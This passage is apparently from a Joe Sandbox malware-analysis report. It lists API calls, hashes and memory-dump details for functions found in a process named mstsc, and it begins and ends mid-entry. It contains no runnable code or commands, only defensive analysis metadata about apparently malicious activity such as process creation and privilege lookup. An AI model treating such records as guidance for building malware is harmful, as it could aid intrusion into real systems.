                                                                                                                      • Instruction Fuzzy Hash: F3319F71A00304ABD714DFA4D885FAAF7F8FB88710F10C52EE6595F245D774BA048BA1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetFileAttributesW.KERNELBASE(?), ref: 00340073
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.23814214008.0000000000330000.00000040.80000000.00040000.00000000.sdmp, Offset: 00330000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_330000_mstsc.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AttributesFile
                                                                                                                      • String ID: @
                                                                                                                      • API String ID: 3188754299-2766056989
                                                                                                                      • Opcode ID: 99ce0f924c7157e04d86e09bd62136bcb509a8e2f74153368ee85b606e5959f8
                                                                                                                      • Instruction ID: 76b03018c6df6dbcbb151fb9db661a8f4d6f3d352b2d30eb897830220bcd5b53
                                                                                                                      • Opcode Fuzzy Hash: 99ce0f924c7157e04d86e09bd62136bcb509a8e2f74153368ee85b606e5959f8
                                                                                                                      • Instruction Fuzzy Hash: 7D7144B19102186ADB26DB64CCC5FEBB3BCBF54300F044999B6199F141EB74BA858B51
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • RtlAllocateHeap.NTDLL(fq4,?,003478FD,003478FD,?,00347166,?,?,?,?,?,00000000,00000005,00000206), ref: 0034CD7D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.23814214008.0000000000330000.00000040.80000000.00040000.00000000.sdmp, Offset: 00330000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_330000_mstsc.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocateHeap
                                                                                                                      • String ID: fq4
                                                                                                                      • API String ID: 1279760036-2760626818
                                                                                                                      • Opcode ID: 35d86b1787a127d6e64756cb09f78bfc81564f84f89f924b9fee1a2c41a8cc0d
                                                                                                                      • Instruction ID: 37a269d4fb8534aee7f816285c24cfa052983eea2455e14c6d3f19786d53e5d7
                                                                                                                      • Opcode Fuzzy Hash: 35d86b1787a127d6e64756cb09f78bfc81564f84f89f924b9fee1a2c41a8cc0d
                                                                                                                      • Instruction Fuzzy Hash: 7EE012B5200218ABCB14EF89CC45EA777ACAF89750F018058BA095B282C630F910CAF1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • CoInitialize.OLE32(00000000,00000000,?,00000000), ref: 00345527
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.23814214008.0000000000330000.00000040.80000000.00040000.00000000.sdmp, Offset: 00330000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_330000_mstsc.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Initialize
                                                                                                                      • String ID: @J7<
                                                                                                                      • API String ID: 2538663250-2016760708
                                                                                                                      • Opcode ID: 09907de0826d50baa22cd9ec6ee93c7b2945dd341ec512956364806ba97be4aa
                                                                                                                      • Instruction ID: 8e540d395e72ca38b63f510d6f3a031cc1180ef016ff4297910ae0e6b515b3ca
                                                                                                                      • Opcode Fuzzy Hash: 09907de0826d50baa22cd9ec6ee93c7b2945dd341ec512956364806ba97be4aa
                                                                                                                      • Instruction Fuzzy Hash: E53150B6A0060A9FDB01DFD8C8809EFB3B9BF88304B108559E516EB215D775FE058BA0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetFileAttributesW.KERNELBASE(?), ref: 0033EA6A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.23814214008.0000000000330000.00000040.80000000.00040000.00000000.sdmp, Offset: 00330000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_330000_mstsc.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AttributesFile
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3188754299-0
                                                                                                                      • Opcode ID: 1662e4c380a1ab4f991967f6572611f52669500c83c5e5fb7401c37234dbd346
                                                                                                                      • Instruction ID: 84ced6f12461848d70ba3f071bea6aba0e3a62c19f3154cc6115d2a25f463c7f
                                                                                                                      • Opcode Fuzzy Hash: 1662e4c380a1ab4f991967f6572611f52669500c83c5e5fb7401c37234dbd346
                                                                                                                      • Instruction Fuzzy Hash: 3E01BD310106426FDB1ACE78C4C5A96BB5ABF86B64F990A9CD094CF1EBC739D10A8785
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0033B412
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.23814214008.0000000000330000.00000040.80000000.00040000.00000000.sdmp, Offset: 00330000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_330000_mstsc.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Load
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2234796835-0
                                                                                                                      • Opcode ID: 8ef11479d6b244e0ff806b47a2c8f284d039975ccda777bcd4a9b1b13f5c100b
                                                                                                                      • Instruction ID: 7f53a71dd4a67a2960f9f7003df9b01da9b1e0090780331172ed8b73d087c515
                                                                                                                      • Opcode Fuzzy Hash: 8ef11479d6b244e0ff806b47a2c8f284d039975ccda777bcd4a9b1b13f5c100b
                                                                                                                      • Instruction Fuzzy Hash: 4B0125B6E4010DABDF11DBE5DC92F9DB3B89F54308F0441A5E9089B141F671EB14C751
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • CreateProcessInternalW.KERNELBASE(00338740,00338768,00338500,00000010,00338768,00000044,?,?,?,00000044,00338768,00000010,00338500,00338768,00338740,003387AC), ref: 0034CE51
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.23814214008.0000000000330000.00000040.80000000.00040000.00000000.sdmp, Offset: 00330000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_330000_mstsc.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateInternalProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2186235152-0
                                                                                                                      • Opcode ID: 1c16b4dfa1a23916d5d1f0d88d4d370c1b7da67b1f73619d4663c95dfd1fc265
                                                                                                                      • Instruction ID: 3083c3cb383124f35a53409107e5256791433cc0355c0c7a6a05b969da913b48
                                                                                                                      • Opcode Fuzzy Hash: 1c16b4dfa1a23916d5d1f0d88d4d370c1b7da67b1f73619d4663c95dfd1fc265
                                                                                                                      • Instruction Fuzzy Hash: 07015BB2214208ABCB58DF89DC81EEB77ADAF8C754F558248BA0D97251D630E851CBA4
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • CreateProcessInternalW.KERNELBASE(00338740,00338768,00338500,00000010,00338768,00000044,?,?,?,00000044,00338768,00000010,00338500,00338768,00338740,003387AC), ref: 0034CE51
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.23814214008.0000000000330000.00000040.80000000.00040000.00000000.sdmp, Offset: 00330000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_330000_mstsc.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateInternalProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2186235152-0
                                                                                                                      • Opcode ID: fa052045444a678b4abb6aad36a74142a8f4874219bd3a71acd9792eedd896c7
                                                                                                                      • Instruction ID: 132ec742cbf42945e360f9cc9dbc39e8001a2d2a2ea16246dbcd7732fc5ebbc3
                                                                                                                      • Opcode Fuzzy Hash: fa052045444a678b4abb6aad36a74142a8f4874219bd3a71acd9792eedd896c7
                                                                                                                      • Instruction Fuzzy Hash: B101F6B2210148ABCB14DF98DC80DEB77B9AF8C254F15824CFE0DA7201C230E851CBA0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • RtlFreeHeap.NTDLL(00000060,00000005,00000000,00000000,00000005,00000060,00000000,00000000,?,?,00000000,00000206,00000000), ref: 0034CDBD
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.23814214008.0000000000330000.00000040.80000000.00040000.00000000.sdmp, Offset: 00330000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_330000_mstsc.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FreeHeap
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3298025750-0
                                                                                                                      • Opcode ID: c07c0fe8387f8e083360c56f48a43e8a823bf62b33a41d365ac503720768cefe
                                                                                                                      • Instruction ID: 7928c05a6af44c582a4fcac8df788c724e7f079ef5053e3dd1aa956f2eac01c6
                                                                                                                      • Opcode Fuzzy Hash: c07c0fe8387f8e083360c56f48a43e8a823bf62b33a41d365ac503720768cefe
                                                                                                                      • Instruction Fuzzy Hash: 3FF09075600218ABCB10EF98CC85DA777A9EF85720F518459F94D9F252D630F910CBE1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,3A390E4F,00000000,00000000,0033E032,?,?,?,3A390E4F,?), ref: 0034B962
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.23814214008.0000000000330000.00000040.80000000.00040000.00000000.sdmp, Offset: 00330000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_330000_mstsc.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateThread
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2422867632-0
                                                                                                                      • Opcode ID: d37599814d86957a22d5e1b535658109f2a790bb7c6d5ca32f2605491252ed84
                                                                                                                      • Instruction ID: 9fccbae665115ba06d360f5047ab3a54c9393e312171ad03df0317795ce1b056
                                                                                                                      • Opcode Fuzzy Hash: d37599814d86957a22d5e1b535658109f2a790bb7c6d5ca32f2605491252ed84
                                                                                                                      • Instruction Fuzzy Hash: 5DF06D3339021436E231A5A9AC02F9BB39CDF80B61F140026FB0CEE2C1EA96B84542B5
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetFileAttributesW.KERNELBASE(?), ref: 0033EA6A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.23814214008.0000000000330000.00000040.80000000.00040000.00000000.sdmp, Offset: 00330000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_330000_mstsc.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AttributesFile
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3188754299-0
                                                                                                                      • Opcode ID: f253d781012e1e156567834be31635918f749e38fdcfc979185194f7bc78d554
                                                                                                                      • Instruction ID: 6c6cddab5eeb4789ae79c19de5fdbb1ebae008826d480a57f46456f1d496b4e2
                                                                                                                      • Opcode Fuzzy Hash: f253d781012e1e156567834be31635918f749e38fdcfc979185194f7bc78d554
                                                                                                                      • Instruction Fuzzy Hash: 93E0267524020027EA119ABCAC85BA93308EB8C774F8A4B51F87DAF2E3D534F9025260
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetFileAttributesW.KERNELBASE(?), ref: 0033EA6A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.23814214008.0000000000330000.00000040.80000000.00040000.00000000.sdmp, Offset: 00330000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_330000_mstsc.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AttributesFile
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3188754299-0
                                                                                                                      • Opcode ID: 6c33e8b82d2175b2cb12c2ed082f22dbd2d66526516060e59ca94ea1d1d246c9
                                                                                                                      • Instruction ID: f5b7ca68f799c3a4e919965eda9762f5fc093d1ec15f6a990edb0877ae7271dd
                                                                                                                      • Opcode Fuzzy Hash: 6c33e8b82d2175b2cb12c2ed082f22dbd2d66526516060e59ca94ea1d1d246c9
                                                                                                                      • Instruction Fuzzy Hash: 17E0867124020427FB14AAEC9C86F7633589B4C764F5A4660B95DDF2D3E574F9015294
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • SetErrorMode.KERNELBASE(00008003,?,?,00338E6A,?), ref: 0033E871
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.23814214008.0000000000330000.00000040.80000000.00040000.00000000.sdmp, Offset: 00330000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_330000_mstsc.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorMode
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2340568224-0
                                                                                                                      • Opcode ID: 6f6e5e04ef94737e317290f3b24212120505c240a63b691f2098a229cd78219d
                                                                                                                      • Instruction ID: f62511d0fd15a92ec2ba509c0f383df3462a13c71b4eed6f0d9557ef631c4437
                                                                                                                      • Opcode Fuzzy Hash: 6f6e5e04ef94737e317290f3b24212120505c240a63b691f2098a229cd78219d
                                                                                                                      • Instruction Fuzzy Hash: 3CE0CD316841403EFB1197B45D83FB92B889F40744F05049DF58DEF383D950E5008721
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • RtlFreeHeap.NTDLL(00000060,00000005,00000000,00000000,00000005,00000060,00000000,00000000,?,?,00000000,00000206,00000000), ref: 0034CDBD
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.23814214008.0000000000330000.00000040.80000000.00040000.00000000.sdmp, Offset: 00330000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_330000_mstsc.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FreeHeap
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3298025750-0
                                                                                                                      • Opcode ID: 389ea324db55789009dfbd2dfe09bce6c38484e17a95f35a61ae741bed111e43
                                                                                                                      • Instruction ID: 584bcb0e3691d29a28dfcab69375db52293c095ca7849ebbf82465680cc32654
                                                                                                                      • Opcode Fuzzy Hash: 389ea324db55789009dfbd2dfe09bce6c38484e17a95f35a61ae741bed111e43
                                                                                                                      • Instruction Fuzzy Hash: 22E012B5200218ABCB14EF89CC49EA77BACAF89750F018054BA085B292C630F910CAF1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,0033E396,0033E396,?,00000000,?,003354FE), ref: 0034CF0D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.23814214008.0000000000330000.00000040.80000000.00040000.00000000.sdmp, Offset: 00330000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_330000_mstsc.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: LookupPrivilegeValue
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3899507212-0
                                                                                                                      • Opcode ID: 4cd4b884fdeeb31c2a51092526f190334ffcbb0be12cc9be7a9cbb924fe6c32f
                                                                                                                      • Instruction ID: 0fd71a37211ca1ffb27108dec98bcafdda0893272e58cbda9bc8e51b1b6d7e1b
                                                                                                                      • Opcode Fuzzy Hash: 4cd4b884fdeeb31c2a51092526f190334ffcbb0be12cc9be7a9cbb924fe6c32f
                                                                                                                      • Instruction Fuzzy Hash: A6E01AB12002186BC710EF49CC41EA737ADAF89650F018058BA085B242C630F8108AF1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • SetErrorMode.KERNELBASE(00008003,?,?,00338E6A,?), ref: 0033E871
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.23814214008.0000000000330000.00000040.80000000.00040000.00000000.sdmp, Offset: 00330000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_330000_mstsc.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorMode
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2340568224-0
                                                                                                                      • Opcode ID: 0574febd26727ef9c0e2f4a4823315b87c9a54f5dcacd1f83b576e71e9e894a9
                                                                                                                      • Instruction ID: 68e6a9b750410c223470eb5051324207be0d2ff56aeadb1546ac42b9bb368960
                                                                                                                      • Opcode Fuzzy Hash: 0574febd26727ef9c0e2f4a4823315b87c9a54f5dcacd1f83b576e71e9e894a9
                                                                                                                      • Instruction Fuzzy Hash: 55D05E716802053BF611AAE49C43F2A328C9B40B54F464069BA0DEE2C3E950F50046A5
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.23833830292.0000000004610000.00000040.00001000.00020000.00000000.sdmp, Offset: 04610000, based on PE: true
                                                                                                                      • Associated: 00000005.00000002.23833830292.0000000004739000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.23833830292.000000000473D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_4610000_mstsc.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: eefe73ae4aea61397855c1ae5dfdb0eda6a557cfd35ee5328f2534168e0c21d6
                                                                                                                      • Instruction ID: f794004bd4e519c58b3e5f46109565019484e1d9daeddbe08f5b18832d2fe80e
                                                                                                                      • Opcode Fuzzy Hash: eefe73ae4aea61397855c1ae5dfdb0eda6a557cfd35ee5328f2534168e0c21d6
                                                                                                                      • Instruction Fuzzy Hash: 82B08C318020C0C6EB00AB2007086063A4067D1304F11C095D1024240A4338D080E131
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.23833830292.0000000004610000.00000040.00001000.00020000.00000000.sdmp, Offset: 04610000, based on PE: true
                                                                                                                      • Associated: 00000005.00000002.23833830292.0000000004739000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.23833830292.000000000473D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_4610000_mstsc.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @
                                                                                                                      • API String ID: 0-2766056989
                                                                                                                      • Opcode ID: 9f61a4bdb5714a2bb9f6651e875168b777453bd48b0093045f8e61e884682dbf
                                                                                                                      • Instruction ID: d55eb5e230aa161ad560fd0d3231e745f10a183cf531d40f785eb74cf5a8015b
                                                                                                                      • Opcode Fuzzy Hash: 9f61a4bdb5714a2bb9f6651e875168b777453bd48b0093045f8e61e884682dbf
                                                                                                                      • Instruction Fuzzy Hash: D551B872604345AFE7259F14C840F6BB7E9FBA4B14F500A2DFA41972A0E7B4FD048B99
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.23833830292.0000000004610000.00000040.00001000.00020000.00000000.sdmp, Offset: 04610000, based on PE: true
                                                                                                                      • Associated: 00000005.00000002.23833830292.0000000004739000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.23833830292.000000000473D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_4610000_mstsc.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: #
                                                                                                                      • API String ID: 0-1885708031
                                                                                                                      • Opcode ID: 6965cac1e13bd5fab6b18dc40a87e1d3c4b851185aea300bbcdbc7d08ff272ce
                                                                                                                      • Instruction ID: ccf1a61c04fee69c4c082cc8eb93eb37f13921654283275e38620241e161cabf
                                                                                                                      • Opcode Fuzzy Hash: 6965cac1e13bd5fab6b18dc40a87e1d3c4b851185aea300bbcdbc7d08ff272ce
                                                                                                                      • Instruction Fuzzy Hash: CD41C071A00619EBDF20DF88C490BBEBBB4EF50706F10455AE941A7305FB30B952C791
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.23833830292.0000000004610000.00000040.00001000.00020000.00000000.sdmp, Offset: 04610000, based on PE: true
                                                                                                                      • Associated: 00000005.00000002.23833830292.0000000004739000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.23833830292.000000000473D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_4610000_mstsc.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 63b20c421a5f0d7cf45695429102df60821ed91581afdeee7473aace158a234d
                                                                                                                      • Instruction ID: 28a6ccf61e9147a8bc744f57d2b91df4041a6adc1bcc6e879be6eaee6fa20b98
                                                                                                                      • Opcode Fuzzy Hash: 63b20c421a5f0d7cf45695429102df60821ed91581afdeee7473aace158a234d
                                                                                                                      • Instruction Fuzzy Hash: C5B1DE31700A45AFDB25CBA4C990BAEBBB6AF84304F1445A9D9929B391FB70FD41CB50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.23833830292.0000000004610000.00000040.00001000.00020000.00000000.sdmp, Offset: 04610000, based on PE: true
                                                                                                                      • Associated: 00000005.00000002.23833830292.0000000004739000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.23833830292.000000000473D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_4610000_mstsc.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 77d6bd533cad0f6acfc348b12123424ef808131496d6281b4ede46b0b05db4bb
                                                                                                                      • Instruction ID: 90b3b8eb0bc2d6862fe2d30b16152f19ed998e82ec61b2ef3a8cf06735863f28
                                                                                                                      • Opcode Fuzzy Hash: 77d6bd533cad0f6acfc348b12123424ef808131496d6281b4ede46b0b05db4bb
                                                                                                                      • Instruction Fuzzy Hash: 18517C71B04A91CFDB25DE18C444B6AB3E5AB84B54F0904A9EC52CB7A0FB34FC919A61
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.23833830292.0000000004610000.00000040.00001000.00020000.00000000.sdmp, Offset: 04610000, based on PE: true
                                                                                                                      • Associated: 00000005.00000002.23833830292.0000000004739000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.23833830292.000000000473D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_4610000_mstsc.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: d3ecd86acbd8c2806cf441ec997b7e0953121127eb91feda286f134aa973d99c
                                                                                                                      • Instruction ID: ce1b2315b81020a0977fb996814cad6561b24c6616ee23f8b42d25b768e2c688
                                                                                                                      • Opcode Fuzzy Hash: d3ecd86acbd8c2806cf441ec997b7e0953121127eb91feda286f134aa973d99c
                                                                                                                      • Instruction Fuzzy Hash: 00417C71508311EBD320DF68C844BABBBE8FF88754F008A2EF598D7251E770A904CB96
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.23833830292.0000000004610000.00000040.00001000.00020000.00000000.sdmp, Offset: 04610000, based on PE: true
                                                                                                                      • Associated: 00000005.00000002.23833830292.0000000004739000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.23833830292.000000000473D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_4610000_mstsc.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: bfef1421a06420b47c6f467bb85d330398d756c0d04a797e77ccbe8852e1bfb1
                                                                                                                      • Instruction ID: 4c52c91325b1e8e0de70ded70f9e02d0913832bd503aa61ca7be5b40ebb6aba4
                                                                                                                      • Opcode Fuzzy Hash: bfef1421a06420b47c6f467bb85d330398d756c0d04a797e77ccbe8852e1bfb1
                                                                                                                      • Instruction Fuzzy Hash: 0C31D372600248AFC721DF14D480A6A77A5EF85B65F14416DEE454B3A3E731FD42CBD8
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.23833830292.0000000004610000.00000040.00001000.00020000.00000000.sdmp, Offset: 04610000, based on PE: true
                                                                                                                      • Associated: 00000005.00000002.23833830292.0000000004739000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.23833830292.000000000473D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_4610000_mstsc.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: a1b4e557b7b6d96287fde1de8d33bbdc744e1877f4158282a9d2cd0b222f4a4e
                                                                                                                      • Instruction ID: 3688e451177d122f4381764a454def5faf62233688b421cf8e1d75c543681099
                                                                                                                      • Opcode Fuzzy Hash: a1b4e557b7b6d96287fde1de8d33bbdc744e1877f4158282a9d2cd0b222f4a4e
                                                                                                                      • Instruction Fuzzy Hash: E1319A716057418FD720DF19C800B6AF7E9FB98700F05496DE8899B391E774EC44CB91
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.23833830292.0000000004610000.00000040.00001000.00020000.00000000.sdmp, Offset: 04610000, based on PE: true
                                                                                                                      • Associated: 00000005.00000002.23833830292.0000000004739000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.23833830292.000000000473D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_4610000_mstsc.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: b26eba46ca2cc6d202efdb0cb00532999ba81e0ab6a7a3cf38bc4c9948b6f94e
                                                                                                                      • Instruction ID: 61d2a28f325e72e143b42763ea99588be4fb8ca88f0b69f77f2409c7c78df223
                                                                                                                      • Opcode Fuzzy Hash: b26eba46ca2cc6d202efdb0cb00532999ba81e0ab6a7a3cf38bc4c9948b6f94e
                                                                                                                      • Instruction Fuzzy Hash: 3021BFB2604300ABE720FF64D940B9A77A8EB9465DF040829BA4197391F634FD45CBAA
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.23833830292.0000000004610000.00000040.00001000.00020000.00000000.sdmp, Offset: 04610000, based on PE: true
                                                                                                                      • Associated: 00000005.00000002.23833830292.0000000004739000.00000040.00001000.00020000.00000000.sdmpDownload File
